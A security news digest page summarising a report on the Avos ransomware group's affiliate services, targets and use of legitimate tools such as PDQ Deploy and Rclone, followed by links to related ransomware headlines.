Security News > 2022 > June > Avos ransomware threat actor updates its attack arsenal
A new report from Cisco Talos Intelligence Group exposes new tools used in Avos ransomware attacks.
The threat actor provides a control panel for the affiliates, a negotiation panel with push and sound notifications, decryption tests, and access to a diverse network of penetration testers, initial access brokers and other contacts.
AvosLocker has already targeted critical infrastructures in the US, such as financial services, manufacturing and government facilities, according to the FBI. The Avos team do not allow attacks against post-Soviet Union countries.
Once all reconnaissance and lateral movements have been completed, the attackers use a legitimate software deployment tool named PDQ Deploy to proliferate the ransomware and other tools across the target network.
In the past, Avos attacks have also revealed the use of other tools: the PuTTY Secure copy client tool, Rclone, Advanced IP scanner and WinLister.
Figure B. Avos victims who do not pay have their data sold, as stated on the Avos website: "All data is FOR SALE. Contact us with your offers. We only sell data to third parties if the owner of said data refuses to pay."
News URL
https://www.techrepublic.com/article/avos-ransomware-updates-attack/
Related news
- BianLian Threat Actors Exploiting JetBrains TeamCity Flaws in Ransomware Attacks (source)
- Black Basta, Bl00dy ransomware gangs join ScreenConnect attacks (source)
- FBI, CISA warn US hospitals of targeted BlackCat ransomware attacks (source)
- FBI Warns U.S. Healthcare Sector of Targeted BlackCat Ransomware Attacks (source)
- LockBit ransomware returns to attacks with new encryptors, servers (source)
- Fidelity customers' financial info feared stolen in suspected ransomware attack (source)
- Fidelity customers' financial info feared stolen in suspected ransomware attack (source)
- Alert: GhostSec and Stormous Launch Joint Ransomware Attacks in Over 15 Countries (source)
- Duvel says it has "more than enough" beer after ransomware attack (source)
- FBI: Critical infrastructure suffers spike in ransomware attacks (source)